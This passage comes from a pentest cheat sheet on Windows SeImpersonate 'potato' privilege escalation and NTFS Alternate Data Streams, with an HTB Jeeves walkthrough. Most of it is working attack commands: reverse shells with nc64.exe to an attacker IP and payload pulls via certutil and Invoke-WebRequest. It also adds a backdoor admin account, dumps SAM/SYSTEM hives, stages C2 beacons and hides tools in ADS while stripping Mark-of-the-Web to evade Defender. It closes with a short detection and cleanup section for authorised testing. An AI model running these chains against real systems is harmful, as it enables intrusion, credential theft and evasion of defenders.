53375 -p cmd.exe -a "/c whoami" -t *`, needs a CLSID matching the OS). **JuicyPotatoNG** is the modern rewrite that works past that hardening. If you're on anything current, use NG, not the legacy binary. - ---- - -## RoguePotato `fas:Terminal` - -**Abuses:** DCOM with a *remote* OXID resolver. RoguePotato forces the DCOM OXID resolution to go out to TCP **135** on a host you control, which redirects it back to a local listener — letting you complete the SYSTEM NTLM negotiation on builds where the fully-local trick doesn't fire. - -**Requirements:** `SeImpersonatePrivilege`, and the ability to reach an attacker-controlled resolver on port 135 (you run a `socat` redirector). This is the one potato with a network dependency. Not bundled here — build from [source](https://github.com/antonioCoco/RoguePotato). - -```bash -# On YOUR box: redirect victim's 135 back to its RoguePotato listener (default 9999) -socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999 -``` - -```batch -:: On the victim: -r = your redirector IP, -l = local OXID listener, -e = command -RoguePotato.exe -r 10.10.14.3 -e "cmd.exe /c whoami > C:\Windows\Temp\r.txt" -l 9999 - -:: Reverse shell variant -RoguePotato.exe -r 10.10.14.3 -e "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -l 9999 -``` - -| Flag | Meaning | -|---|---| -| `-r <IP>` | Remote OXID resolver IP — your box running the `socat` redirect on 135 | -| `-e <COMMAND>` | Command to execute as SYSTEM | -| `-l <PORT>` | Local fake OXID resolver listen port (default `9999`; must match the `socat` target) | -| `-c <CLSID>` | Specific CLSID to activate | -| `-p <PIPE>` | Named pipe to use (advanced) | -| `-z` | Test mode — check whether the technique will work without executing | - -> [!warning]+ RoguePotato needs egress to port 135 -> `fas:TriangleExclamation` -> If outbound/redirected 135 to your redirector is blocked (very common on segmented internal networks), RoguePotato can't complete. In that case fall back to a fully-local potato — GodPotato, EfsPotato, or SweetPotato's EfsRpc mode — which need no network at all. - ---- - -## EfsPotato `fas:Terminal` - -**Abuses:** MS-EFSR, the Encrypting File System Remote Protocol (the same RPC family as PetitPotam). EfsPotato coerces SYSTEM to authenticate to a local pipe via an EFS RPC call, then impersonates. It exposes **several RPC interfaces**, so when Microsoft patches one you switch to another with a single argument. - -**Requirements:** `SeImpersonatePrivilege` **or** `SeAssignPrimaryTokenPrivilege`. It is tiny and self-contained, which makes it a favourite from `xp_cmdshell` and cramped web shells. Not bundled here — grab or compile from [source](https://github.com/zcgonvh/EfsPotato) (single `.cs`, buildable on-target with `csc.exe`). - -```batch -:: Simplest form — run a command as SYSTEM -EfsPotato.exe "whoami" -EfsPotato.exe "net user backdoor P@ssw0rd123! /add" - -:: Pick a specific RPC pipe when the default is patched -:: valid pipes: lsarpc | efsrpc | samr | lsass | netlogon -EfsPotato.exe "whoami" lsarpc -EfsPotato.exe "whoami" efsrpc - -:: Reverse shell -EfsPotato.exe "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -``` - -```powershell -# Compile on-target if you only have the .cs (no external toolchain needed) -C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /nowarn:1691,618 EfsPotato.cs -``` - -| Argument | Meaning | -|---|---| -| `<command>` (1st positional) | Command to run as SYSTEM | -| `<pipe>` (2nd positional, optional) | RPC interface to abuse: `lsarpc`, `efsrpc`, `samr`, `lsass`, `netlogon` — rotate through these if the default is blocked/patched | - -> [!tip]+ Everything EfsPotato can do -> `fas:Lightbulb` -> Fully local (no Spooler, no network), tiny, and compilable on-target — which is why it shines from MSSQL `xp_cmdshell` and low-footprint web shells. Its standout feature is the **swappable RPC pipe**: if `EfsPotato.exe "whoami"` fails because one interface is patched, retry with `lsarpc`, then `efsrpc`, then `samr`, etc. SweetPotato's `EfsRpc` mode is the same primitive wrapped in a bigger multi-tool. - ---- - -## SweetPotato `fas:Terminal` - -**Abuses:** whatever you select. SweetPotato bundles several coercion primitives behind a `-e` switch — commonly `EfsRpc` (default), `PrintSpoofer`, and `DCOM` (older/other forks also carry `RottenPotato`) — so a single binary carries built-in fallbacks. When one mode fails, change `-e` instead of uploading a new tool. The exact set depends on the fork; run `SweetPotato.exe -h` to see what your build exposes. - -**Requirements:** `SeImpersonatePrivilege`. Modern builds. Bundled: [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)). - -```batch -:: Default (EfsRpc mode) — run a command as SYSTEM -SweetPotato.exe -a "/c whoami" - -:: Force a specific technique -SweetPotato.exe -e EfsRpc -p C:\Windows\System32\cmd.exe -a "/c whoami" -SweetPotato.exe -e PrintSpoofer -p C:\Windows\System32\cmd.exe -a "/c whoami" -SweetPotato.exe -e DCOM -p C:\Windows\System32\cmd.exe -a "/c whoami" - -:: Reverse shell -SweetPotato.exe -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -``` - -| Flag | Meaning | -|---|---| -| `-e <EXPLOIT>` | Technique: `EfsRpc` (default), `PrintSpoofer`, `DCOM` (fork-dependent; some carry `RottenPotato`) | -| `-p <PROGRAM>` | Program to launch (default `cmd.exe`) | -| `-a <ARGS>` | Arguments (e.g. `"/c whoami"`) | -| `-l <PORT>` | COM server listen port (for `DCOM`/`RottenPotato` modes) | -| `-c <CLSID>` | CLSID for DCOM-based modes | - -> [!tip]+ Everything SweetPotato can do -> `fas:Lightbulb` -> It's the "one binary, several potatoes" option. Start with the default `EfsRpc`, and if it fails cycle `-e PrintSpoofer` (needs the Spooler) → `-e DCOM` → `-e RottenPotato`. Handy when you can only upload one file but don't know yet which primitive the target will accept. - ---- - -## Delivery — getting a potato onto the box and running it `fas:RocketLaunch` - -You rarely get a clean interactive prompt. These are the common contexts where you already hold a `SeImpersonate` account and how to drive a potato from each. Transfer methods (SMB, HTTP, `certutil`, `iwr`) are in [Foothold — File Transfers](/sheets/pentest-workflow/foothold-file-transfers). - -### From MSSQL `xp_cmdshell` - -MSSQL service accounts almost always hold `SeImpersonate`. This is the classic MSSQL → SYSTEM chain. - -```sql --- 1) enable xp_cmdshell -EXEC sp_configure 'show advanced options', 1; RECONFIGURE; -EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; - --- 2) confirm the privilege -EXEC xp_cmdshell 'whoami /priv'; - --- 3) stage the potato (HTTP pull from your box) -EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.3/GodPotato-NET4.exe C:\Windows\Temp\g.exe'; - --- 4) fire it as SYSTEM -EXEC xp_cmdshell 'C:\Windows\Temp\g.exe -cmd "cmd /c net localgroup administrators sql_svc /add"'; -``` - -### From an IIS / ASPX web shell - -IIS AppPool identities hold `SeImpersonate` by design. From a web shell (`whoami` → `iis apppool\...`): - -```powershell -# Pull the tool, then run it — one command per web-shell request -Invoke-WebRequest -Uri http://10.10.14.3/PrintSpoofer64.exe -OutFile C:\Windows\Temp\ps.exe -C:\Windows\Temp\ps.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -``` - -`C:\Windows\Temp` and `C:\Windows\System32\spool\drivers\color` are usually writable by the AppPool identity — good staging spots. See [Web Shells](/sheets/pentest-workflow/web-shells) for the shell itself. - -### From WinRM / evil-winrm - -```bash -# On your box -evil-winrm -i 10.10.10.100 -u svc_web -p 'Password123!' -``` - -```powershell -# Inside the session — upload is built into evil-winrm -upload /opt/tools/GodPotato-NET4.exe C:\Windows\Temp\g.exe -C:\Windows\Temp\g.exe -cmd "cmd /c whoami" -``` - -> [!tip]+ Interactive vs. one-shot potatoes -> `fas:Lightbulb` -> **PrintSpoofer** (`-i -c cmd`) and **JuicyPotatoNG** (`-i`) can hand you a *live* SYSTEM prompt. **GodPotato**, **EfsPotato**, **RoguePotato**, and **SweetPotato** run one command per invocation — so from those, have them launch `nc64.exe`/a C2 stager for your shell rather than expecting a prompt to appear. - -### SYSTEM payload cookbook - -What to actually run once a potato lands you SYSTEM. Track every artefact you create for cleanup. - -```batch -:: Interactive shell (PrintSpoofer / JuicyPotatoNG) -... -i -c cmd - -:: Reverse shell (any potato) — nc -lnvp 8443 on your box -... "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" - -:: Local admin (loud, logged — prefer a shell/token over a new account on real engagements) -... "cmd /c net user backdoor P@ssw0rd123! /add & net localgroup administrators backdoor /add" - -:: Dump the SAM/SYSTEM hives for offline hash extraction -... "cmd /c reg save HKLM\SAM C:\Windows\Temp\sam.sav /y & reg save HKLM\SYSTEM C:\Windows\Temp\sys.sav /y" - -:: Stage a Meterpreter/Sliver/C2 beacon as SYSTEM -... "cmd /c C:\Windows\Temp\beacon.exe" -``` - -Then pull the hives and crack offline: `impacket-secretsdump -sam sam.sav -system sys.sav LOCAL`. - ---- - -## NTFS Alternate Data Streams (ADS) `ris:FileList` - -ADS are the trick you pair with the potatoes: stage the binary in a stream so it doesn't show in a directory listing, and strip Mark-of-the-Web off anything you downloaded so SmartScreen/Defender don't flag it. They're a legitimate NTFS feature, quietly abused for hiding data since Windows NT. - -### What an ADS actually is - -On NTFS, every file has at least one data stream — the **default (unnamed) stream** that holds the content you normally see. NTFS lets you attach additional **named streams** to the same file. The main file keeps its name and its reported size; the extra streams ride along invisibly. - -**Syntax:** `filename:streamname:streamtype` - -Common stream types: - -| Type | Purpose | -|---|---| -| `$DATA` | Actual data content — by far the most common, and what you'll use | -| `$INDEX_ALLOCATION` | Directory indexes (attaching this to a name creates a directory-like object) | -| others | Assorted NTFS metadata streams | - -Why it matters to both sides of the keyboard: - -- **Invisible to normal listings.** Plain `dir` and Explorer don't show streams — you need `dir /r` or PowerShell's `-Stream`. -- **They don't change the file's reported size.** The host file still shows its original size; the stream's bytes aren't counted. -- **They travel with the file on NTFS**, and are **silently stripped** when the file crosses to FAT32/exFAT, most network shares, email, or an HTTP upload. Handy for evasion; a trap if you rely on a stream surviving a copy. -- **No special permission needed.** If you can write the file, you can add a stream to it. - -### Reading a stream - -```batch -:: cmd — the classic -more < "C:\Windows\Temp\notes.txt:hidden:$DATA" -``` - -```powershell -# PowerShell — cleanest -Get-Content C:\Windows\Temp\notes.txt -Stream hidden - -# notepad opens a named stream directly -notepad C:\Windows\Temp\notes.txt:hidden -``` - -### Finding streams (both sides) - -```batch -:: cmd — /r reveals streams next to each file (look for the "file:stream:$DATA" lines) -dir /r C:\Windows\Temp -``` - -```powershell -# PowerShell — list every stream on a file, or hunt a whole tree -Get-Item C:\Windows\Temp\notes.txt -Stream * -Get-ChildItem C:\Users -Recurse | ForEach-Object { Get-Item $_.FullName -Stream * -ErrorAction SilentlyContinue } | - Where-Object Stream -ne ':$DATA' -``` - -```batch -:: Sysinternals streams.exe — purpose-built, recursive -streams.exe -s C:\Users -``` - -### Writing / staging into a stream - -```batch -:: Hide text -echo secret-loot-here > "C:\Windows\Temp\notes.txt:stash" - -:: Stash a binary inside an innocuous host file (NTFS→NTFS copy) -type C:\Tools\GodPotato-NET4.exe > "C:\Windows\Temp\log.txt:g.exe" -``` - -```powershell -# PowerShell staging -Set-Content -Path C:\Windows\Temp\notes.txt -Stream stash -Value 'secret-loot-here' -``` - -> [!warning]+ Running an EXE straight from a stream is mostly dead on modern Windows -> `fas:TriangleExclamation` -> Older Windows let you launch a process whose image *was* an ADS. Current builds block that — `start file.txt:g.exe` / `Start-Process` against a stream fails. So use ADS for **staging and hiding**, then **copy the payload back out to a normal file to execute it**: -> ```batch -> type C:\Tools\GodPotato-NET4.exe > C:\Windows\Temp\log.txt:g.exe :: hide -> more < C:\Windows\Temp\log.txt:g.exe > C:\Windows\Temp\g.exe :: extract to run -> C:\Windows\Temp\g.exe -cmd "cmd /c whoami" -> ``` -> Script and DLL loaders (`powershell`, `wscript`/`cscript`, `rundll32`, `regsvr32`) can still be *fed* from a stream via LOLBINs, but the reliable, portable pattern is stage-in-stream → extract → run. - -### Mark-of-the-Web — the ADS you meet every engagement - -Every file a browser or `Invoke-WebRequest` downloads gets a `Zone.Identifier` stream (Mark-of-the-Web). It's what makes SmartScreen and Defender treat a file as "from the internet." Reading it is a forensics staple; stripping it is an evasion staple. - -```powershell -# See where a downloaded file came from (blue-team / OSINT gold — often has the source URL) -Get-Content .\PrintSpoofer64.exe -Stream Zone.Identifier - -# Strip MOTW so SmartScreen/Defender stop nagging (two equivalent ways) -Remove-Item .\PrintSpoofer64.exe -Stream Zone.Identifier -Unblock-File .\PrintSpoofer64.exe -``` - -```batch -:: The stealthiest way to drop MOTW is to never create it: pull the tool with a -:: transport that doesn't write Zone.Identifier (SMB copy, certutil), not a browser. -certutil -urlcache -f http://10.10.14.3/PrintSpoofer64.exe C:\Windows\Temp\ps.exe -``` - -### Removing a stream - -```powershell -# Delete just one stream, keep the file -Remove-Item C:\Windows\Temp\notes.txt -Stream stash -``` - -```batch -:: cmd has no native single-stream delete — round-trip through a non-NTFS -:: filesystem (copy off to FAT/exFAT and back) strips every stream at once. -``` - -> [!info]+ How the potatoes and ADS fit together -> `fas:Lightbulb` -> The workflow: land as a `SeImpersonate` service account → stage your potato + `nc64.exe` inside an ADS on a boring file in `C:\Windows\Temp` so a casual `dir` shows nothing → strip `Zone.Identifier` (or transfer with `certutil`/SMB so it's never written) → extract to a normal path → run the potato → SYSTEM. Then clean the streams **and** the extracted files at teardown. - ---- - -## Field method — finding and landing a SeImpersonate → SYSTEM chain `fas:Route` - -The potatoes are the easy part. The skill is the four steps *around* them: recognise that your shell holds impersonation rights, fingerprint the host so you pick a tool that actually fires on **this** build, get the binary across when the box has no download tools, then drive it non-interactively and read the result. Below is that method as a repeatable loop. A single awkward old box — HTB Jeeves, Windows 10 build 10586 — runs underneath as a case study, because the boxes where the *newest* potato fails are exactly the ones that teach you why fingerprinting matters. - -<figure class="flow plate corners"> - <figcaption class="flow__cap"><span class="flow__kind">Run a potato — the loop</span><span class="flow__dir">TD</span></figcaption> - <div class="flow__body"> - <svg class="flow-svg" viewBox="0 0 790 700" role="img" aria-label="Enumerate privileges, pick a tool by OS era, transfer and fire it, check for SYSTEM; on failure switch tool and retry, on success move to SYSTEM recon"> - <path class="fedge" d="M300,90 L300,140" marker-end="url(#flow-arrow)" /> - <path class="fedge" d="M300,200 L300,250" marker-end="url(#flow-arrow)" /> - <path class="fedge" d="M300,310 L300,360" marker-end="url(#flow-arrow)" /> - <path class="fedge" d="M300,420 L300,470" marker-end="url(#flow-arrow)" /> - <path class="fedge" d="M300,530 L300,600" marker-end="url(#flow-arrow)" /> - <path class="fedge is-back" d="M425,500 L620,500 L620,200" marker-end="url(#flow-arrow)" /> - <path class="fedge is-back" d="M495,170 L427,170" marker-end="url(#flow-arrow)" /> - <g class="fnode is-entry"><rect class="fnode__box" x="175" y="30" width="250" height="60" /><text class="fnode__label" x="300" y="56" text-anchor="middle">1 · whoami /priv + /groups<tspan class="sub" x="300" dy="15">SeImpersonate? SERVICE token?</tspan></text></g> - <g class="fnode"><rect class="fnode__box" x="175" y="140" width="250" height="60" /><text class="fnode__label" x="300" y="166" text-anchor="middle">2 · systeminfo → OS build<tspan class="sub" x="300" dy="15">choose tool by DCOM era</tspan></text></g> - <g class="fnode"><rect class="fnode__box" x="175" y="250" width="250" height="60" /><text class="fnode__label" x="300" y="276" text-anchor="middle">3 · Transfer the binary<tspan class="sub" x="300" dy="15">certutil / IWR / SMB share</tspan></text></g> - <g class="fnode"><rect class="fnode__box" x="175" y="360" width="250" height="60" /><text class="fnode__label" x="300" y="386" text-anchor="middle">4 · Fire non-interactively<tspan class="sub" x="300" dy="15">output → a file you can read</tspan></text></g> - <g class="fnode is-decision"><rect class="fnode__box" x="175" y="470" width="250" height="60" /><text class="fnode__label" x="300" y="496" text-anchor="middle">authresult 0 /<tspan class="sub" x="300" dy="15">NT AUTHORITY\SYSTEM?</tspan></text></g> - <g class="fnode is-note"><rect class="fnode__box" x="495" y="140" width="250" height="60" /><text class="fnode__label" x="620" y="166" text-anchor="middle">Wrong tool for the era —<tspan class="sub" x="620" dy="15">switch potato, not port</tspan></text></g> - <g class="fnode is-goal"><rect class="fnode__box" x="175" y="600" width="250" height="66" /><text class="fnode__label" x="300" y="622" text-anchor="middle">5 · SYSTEM recon:<tspan class="sub" x="300" dy="14">dir /r other profiles → read ADS,</tspan><tspan class="sub" x="300" dy="14">creds, hives, flags</tspan></text></g> - <g class="felabel"><rect class="felabel__box" x="283" y="557" width="34" height="16" /><text class="felabel__text" x="300" y="568" text-anchor="middle">Yes</text></g> - <g class="felabel"><rect class="felabel__box" x="507" y="492" width="26" height="16" /><text class="felabel__text" x="520" y="503" text-anchor="middle">No</text></g> - </svg> - </div> -</figure> - -### 1 · Spot the opportunity — is your token weaponisable? `fas:Terminal` - -Two commands tell you whether a potato is even on the table: - -```batch -whoami /priv :: look for SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege -whoami /groups :: look for NT AUTHORITY\SERVICE (S-1-5-6) and the integrity level -``` - -`whoami /priv` is the direct check, but on stripped shells it's sometimes truncated or lies. `whoami /groups` is the corroborating tell: membership in **`NT AUTHORITY\SERVICE` (S-1-5-6)** means you're running as a *service*, and service accounts almost always carry `SeImpersonate`. A `High Mandatory Level` label alongside it says the process is already high-integrity — common for service RCE. That combination (`BUILTIN\Users` + `NT AUTHORITY\SERVICE` + High integrity) is the fingerprint of "web/app service account that can be potatoed," even before you confirm the privilege. - -Where you land in that context: - -- **IIS AppPool** identities (ASPX/PHP web shells on IIS). -- **MSSQL** service accounts (`xp_cmdshell`). -- **App-server RCE** — Jenkins, Tomcat, GitLab runners, ColdFusion. *On Jeeves this is an unauthenticated Jenkins script console on `:50000`, running as `JEEVES\kohsuke` — `whoami /groups` shows `NT AUTHORITY\SERVICE` and High integrity, so the privilege is there even though `whoami /priv` output was minimal.* -- Any **cracked service credential** you can `runas`/`psexec` with. - -### 2 · Fingerprint the host — the DCOM era decides your tool `fas:MagnifyingGlass` - -This is the step most write-ups skip, and it's why "just run the newest potato" fails. Get the exact build first: - -```batch -systeminfo | findstr /B /C:"OS Name" /C:"OS Version" -:: or, quicker: -ver -``` -```powershell -[environment]::OSVersion.Version # e.g. 10.0.10586.0 -``` - -Now the concept that ties the whole family together — **the DCOM hardening line of September 2018 (Windows 10 1809 / Server 2019):** - -- The **original** RottenPotato → JuicyPotato technique abuses `CoGetInstanceFromIStorage`: it kicks off a DCOM activation of a SYSTEM-owned CLSID and hands it a marshalled object that points OXID resolution at **`127.0.0.1:<your -l port>`**. `RPCSS` (SYSTEM) dutifully authenticates to that local port over NTLM; the tool catches that auth, negotiates a SYSTEM token, and impersonates it. Pick a CLSID that runs as SYSTEM and a free local port, and it fires. -- The **1809 / Server 2019 patch** changed DCOM so that OXID resolution no longer honours your custom port — it's forced back to port 135. That single change **killed the original JuicyPotato on 1809 and later.** -- **JuicyPotatoNG** (decoder_it & splinter_code) is the *re-do for the post-patch world*: it uses a different CLSID (the PrintNotify service, `{854A20FB-2D44-457D-992F-EF13785D2B51}`, on default port 10247) and a local SSPI/COM negotiation trick that survives the hardening. **PrintSpoofer** (Spooler named pipe) and **GodPotato** (in-process fake OXID resolver) are the other post-patch answers. - -So legacy and NG are built for **opposite eras**, and newer is not better: - -| Target build | First choice | Why | -|---|---|---| -| Win10 ≤ 1803 / Server 2016 / **build 10586** | **Legacy JuicyPotato** | Pre-hardening — the `-l`-port OXID redirect still works; NG/GodPotato often *don't* on these old builds | -| Win10 1809+ / Server 2019+ / Win11 | **PrintSpoofer** (Spooler up) → **GodPotato** → **JuicyPotatoNG** | Post-hardening — the original is dead; these are the workarounds | - -Check the Spooler if you're eyeing PrintSpoofer: `sc query spooler` → `RUNNING`. Per-OS CLSID tables for JuicyPotato live at [ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID/); the **BITS** CLSID `{4991d34b-80a1-4291-83b6-3328366b9097}` is a dependable SYSTEM-owning pick across many builds. - -### 3 · Land the binary when the box has no download tools `fas:RocketLaunch` - -Old and minimal Windows often has **no `curl`, no `wget`, no `certutil` you can rely on** (`curl.exe` only shipped with build 17063 in 2017 — Jeeves' 10586 has none of them). Work down this ladder: - -```powershell -# Best case — PowerShell is present -Invoke-WebRequest http://10.10.14.3/jp.exe -OutFile C:\Users\kohsuke\jp.exe -(New-Object Net.WebClient).DownloadFile('http://10.10.14.3/jp.exe','C:\Users\kohsuke\jp.exe') -``` -```batch -:: If certutil exists -certutil -urlcache -f http://10.10.14.3/jp.exe C:\Users\kohsuke\jp.exe -``` - -When none of those work, fall back to an **SMB share** — the reliable transport on stripped hosts: - -```bash -# On your box — SMBv2 + auth (modern Windows refuses guest/anonymous SMB) -impacket-smbserver SHARE /tmp/share -smb2support -user temp -password temp -``` -```batch -:: On the target — map, copy, then clean up the mapping when done -net use Z: \\10.10.14.3\SHARE /user:temp temp -copy Z:\JuicyPotato.exe . -copy Z:\nc64.exe . -... :: run your attack -net use Z: /delete -``` - -Stage into a directory your account owns and can execute from — your own profile (`C:\Users\<you>\`) or `C:\Windows\Temp`. You can also run straight off the share (`Z:\jp.exe ...`) if you'd rather not drop the file. - -### 4 · Fire it non-interactively and actually read the output `fas:Terminal` - -Legacy JuicyPotato, GodPotato, EfsPotato and RoguePotato **don't hand you a shell** — they run one command as SYSTEM and exit. So make SYSTEM write its output somewhere your low-priv user can read, then read it back: - -```batch -JuicyPotato.exe -l 53375 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\kohsuke\out.txt 2>&1" -t * -type C:\Users\kohsuke\out.txt -``` - -The three knobs, and the traps behind each: - -- **`-t *`** — try both `CreateProcessWithTokenW` (needs SeImpersonate) and `CreateProcessAsUser` (needs SeAssignPrimaryToken). A win prints `[+] authresult 0` and `NT AUTHORITY\SYSTEM`. -- **`-l <port>` — a free local port.** Confirm with `netstat -ano | findstr ":53375 "` (no output = free). **Trap:** a *failed* run also produces the output file — from your redirect, not from SYSTEM. Always `type` it and confirm it says `nt authority\system`; an empty file or a `whoami` usage error means the exploit didn't run, not that you're SYSTEM. -- **`-a "<args>"` must be one clean line.** **Trap seen live:** pasting a long command into a raw shell can wrap the line and split the `-a` string, so `whoami` runs with a stray argument and your output file contains `ERROR: Invalid argument/option - ''`. That's a mangled paste, not a broken exploit — retype it on one line. - -> [!warning]+ "The privileged process failed to communicate with our COM Server" is (usually) not a port problem -> `fas:TriangleExclamation` -> JuicyPotatoNG prints this same line whenever no SYSTEM authentication reaches its local COM server within its ~3-second window — and it *suggests* trying another `-l` port, which sends people down a rabbit hole. If you've already confirmed the port is free (or `-s` says the firewall is off and every port should work) and it still fails on **every** port and **every** CLSID, the port was never the issue: **the trigger is incompatible with this OS build.** NG's CLSID triggers and local TCP handling were engineered for post-1809 Windows; on a pre-hardening build like 10586 the privileged process never routes its auth back to NG's socket, so it times out with the generic error. GodPotato can fail on the same old builds too — its OXID unmarshal returns `0x80070776` (`OR_INVALID_OXID`, "the object exporter specified was not found") and it reports `Failed to impersonate security context token`. The fix is not a different port; it's the **era-correct tool** — drop to the original JuicyPotato, which uses the pre-hardening technique the box still permits. - -### 5 · Read what only SYSTEM can see — including ADS `ris:FileList` - -SYSTEM lets you into other users' profiles, and that's where the interesting things hide — credentials, KeePass databases, second-stage tooling, and data tucked into **Alternate Data Streams**. Make `dir /r` a reflex on every profile and desktop, because plain `dir` and Explorer never show streams: - -```batch -:: as SYSTEM, list streams under a profile you couldn't read before -JuicyPotato.exe -l 53376 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c dir /r C:\Users\Administrator\Desktop > C:\Users\kohsuke\ads.txt 2>&1" -t * -type C:\Users\kohsuke\ads.txt -``` - -A tell-tale stream line looks like this — a file whose visible content is tiny, carrying a named `$DATA` stream beside it: - -```text - 36 hm.txt - 34 hm.txt:root.txt:$DATA -``` - -Then read the stream (as SYSTEM if the file isn't yours), redirecting to a file you can open: - -```batch -JuicyPotato.exe -l 53377 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c more < C:\Users\Administrator\Desktop\hm.txt:root.txt > C:\Users\kohsuke\flag.txt 2>&1" -t * -type C:\Users\kohsuke\flag.txt -``` - -`more <` is the dependable stream reader from `cmd`; from a real SYSTEM shell you'd just run `more < C:\Users\Administrator\Desktop\hm.txt:root.txt` (or `Get-Content ... -Stream root.txt`). The same move finds creds and staged payloads parked in streams on any box — see the full [Alternate Data Streams](#ntfs-alternate-data-streams-ads-risfilelist) section above for listing, reading, and hiding. - -> [!example]+ Case study — HTB Jeeves (build 10586): the sequence that actually worked -> `fas:Spider` -> Every "newer" potato failed here, which is the whole lesson. The console showed: -> - `PrintSpoofer64.exe` / `JuicyPotatoNG.exe` — *not staged yet* (`not recognized`), so transfer first. -> - `JuicyPotatoNG` (default PrintNotify CLSID on 10247, then ports 9999 / 53375, then BITS CLSID) — **every attempt** returned `failed to communicate with our COM Server`. Not a port problem: 10586 is pre-hardening, so NG's trigger never completes. -> - `GodPotato-NET4` — `UnmarshalObject: 0x80070776` → `Failed to impersonate security context token`. Same story: OXID unmarshal doesn't resolve on this build. -> -> The era-correct tool won on the first try: -> ```batch -> :: 1) no curl/wget/certutil — pull tools over SMB -> net use Z: \\10.10.14.197\SHARE /user:temp temp -> copy Z:\JuicyPotato.exe . -> :: 2) legacy JuicyPotato, BITS CLSID, free port → SYSTEM -> JuicyPotato.exe -l 53375 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\kohsuke\system-check.txt 2>&1" -t * -> type system-check.txt :: -> nt authority\system ([+] authresult 0 / CreateProcessWithTokenW OK) -> :: 3) find the ADS, then read it — both as SYSTEM -> JuicyPotato.exe -l 53376 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c dir /r C:\Users\Administrator\Desktop > C:\Users\kohsuke\ads.txt 2>&1" -t * -> type ads.txt :: -> ... 34 hm.txt:root.txt:$DATA -> JuicyPotato.exe -l 53377 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c more < C:\Users\Administrator\Desktop\hm.txt:root.txt > C:\Users\kohsuke\flag.txt 2>&1" -t * -> type flag.txt :: -> the root flag -> ``` - -> [!success]+ The transferable checklist -> `fas:Lightbulb` -> 1. **`whoami /priv` *and* `/groups`** — `SeImpersonate`, or `NT AUTHORITY\SERVICE` + High integrity, means go. -> 2. **`systeminfo` first** — the OS build, not the calendar, picks the tool. Pre-1809 → original JuicyPotato; 1809+ → PrintSpoofer / GodPotato / NG. -> 3. **No download tools? Use an SMB share** (`impacket-smbserver -smb2support -user … -password …` ↔ `net use`), then `net use … /delete`. -> 4. **No shell? Redirect to a file you own** and `type` it back — and *read* it to confirm `nt authority\system`, since a failed run leaves a file too. -> 5. **A generic "try another port" error on every port = wrong tool for the era, not the wrong port.** -> 6. **`dir /r` every profile you couldn't read before** — flags, creds, and payloads get parked in ADS. - ---- - -## Detection, OPSEC & cleanup `fas:Shield` - -> [!danger] Authorised testing only -> `fas:TriangleExclamation` -> Potato attacks land you SYSTEM and ADS hide artefacts on a real host. Run these only against systems you're explicitly authorised to test. Track every binary, stream, user, and hive dump you create, with full paths, and remove them at cleanup. - -**What the blue team sees:** - -| Signal | Where | -|---|---| -| `4672` Special privileges assigned to new logon; `4624` logon type 9 (new credentials) | Security log — the token-impersonation moment | -| `4688` process creation — a service account spawning `cmd.exe`/`nc64.exe`/unknown EXE from `C:\Windows\Temp` | Security log / Sysmon Event 1 | -| Named-pipe creation on `\pipe\spoolss` and odd DCOM/RPC activity | Sysmon Events 17/18 (pipe), 3 (network) | -| Files/EXEs written to `C:\Windows\Temp`, spooler dirs; new `$DATA` streams | Sysmon Event 11; `Get-Item -Stream *`, `streams.exe`, `dir /r` | -| A downloaded tool's `Zone.Identifier` still naming your web server | ADS on the artefact | - -**OPSEC notes:** - -- Potatoes touch high-signal primitives (Spooler pipe, DCOM). On a monitored estate expect EDR to alert — don't burn a careful engagement on a noisy `net user ... /add`. Prefer a SYSTEM shell/token to standing up a new account. -- `C:\Windows\Temp` is convenient but heavily watched. Rename binaries to something dull; don't leave `GodPotato.exe` on disk. -- ADS defeats a `dir` and a size check, not a defender who runs `dir /r` / `streams.exe` — treat it as *reduces casual visibility*, not *invisible*. - -**Cleanup checklist:** - -```powershell -Remove-Item C:\Windows\Temp\ps.exe, C:\Windows\Temp\g.exe -Force -ErrorAction SilentlyContinue -Remove-Item C:\Windows\Temp\sam.sav, C:\Windows\Temp\sys.sav -Force -ErrorAction SilentlyContinue -Remove-Item C:\Windows\Temp\log.txt -Stream g.exe -ErrorAction SilentlyContinue # the ADS -net user backdoor /del 2>$null # if you created one -``` - ---- - -## References `fas:BookOpen` - -| Tool / topic | Source | -|---|---| -| PrintSpoofer | [github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) · [itm4n write-up](https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/) | -| GodPotato | [github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) | -| JuicyPotatoNG | [github.com/antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) | -| JuicyPotato (legacy) | [github.com/ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) | -| RoguePotato | [github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) | -| EfsPotato | [github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) | -| SweetPotato | [github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato) | -| The Potato family, explained | [jlajara.gitlab.io — potatoes](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) | -| NTFS ADS / Mark-of-the-Web | [MITRE ATT&CK 